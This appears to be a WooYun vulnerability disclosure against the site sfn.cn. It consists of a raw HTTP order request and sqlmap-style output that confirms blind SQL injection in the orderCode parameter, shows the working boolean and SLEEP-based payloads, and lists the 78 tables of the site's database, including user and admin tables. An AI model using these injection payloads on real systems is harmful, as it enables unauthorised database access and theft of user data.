WooYun.org

POST http://www.sfn.cn/order HTTP/1.1
Host: www.sfn.cn
Proxy-Connection: keep-alive
Content-Length: 37
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.sfn.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.sfn.cn/order
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4,ko;q=0.2,ja;q=0.2,es;q=0.2
Cookie: 
orderCode=150104154127207&payStatus=1

---
Place: POST
Parameter: orderCode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: orderCode=150104154127207' AND 1077=1077 AND 'yENh' LIKE 'yENh&payStatus=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: orderCode=150104154127207' AND SLEEP(5) AND 'dLyU' LIKE 'dLyU&payStatus=1
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] sanfront

Database: sanfront
[78 tables]
+----------------------------+
| domain                     |
| user                       |
| zone                       |
| account                    |
| accountAdd                 |
| accountRemove              |
| adminUser                  |
| agent_info                 |
| agent_price                |
| borrow_account             |
| borrow_account_detail      |
| cart                       |
| city                       |
| contact                    |
| country                    |
| cp_tempList                |
| cp_tempSort                |
| district                   |
| dns_records                |
| dns_rr                     |
| dns_zone                   |
| domainRRNum                |
| domain_history             |
| domain_redemption          |
| domain_status              |
| domain_transfer_in         |
| domain_transfer_owner      |
| email                      |
| general                    |
| general_transfer_in        |
| host                       |
| hosting                    |
| invoice                    |
| job_employ_education       |
| job_employ_family          |
| job_employ_registration    |
| job_employ_training        |
| job_employ_work_experience |
| lookup                     |
| newsInfo                   |
| newsSort                   |
| orderDetail                |
| orderInfo                  |
| original                   |
| password_apply             |
| pollMessage                |
| product                    |
| productEmail               |
| productHosting             |
| productPrice               |
| productVPS                 |
| productVirtualHost         |
| province                   |
| rechargeapply              |
| resource                   |
| revenue                    |
| revenue_apply              |
| role                       |
| role_task                  |
| rr                         |
| slides                     |
| task                       |
| task_resource              |
| tempList                   |
| tempSort                   |
| trustedSite                |
| trustedSiteDomain          |
| trustedSiteMaterial        |
| url_redirect               |
| user_role                  |
| user_task                  |
| user_transfer              |
| virtualHost                |
| vps                        |
| websiting                  |
| websiting_history          |
| wireless                   |
| wireless_transfer_in       |
+----------------------------+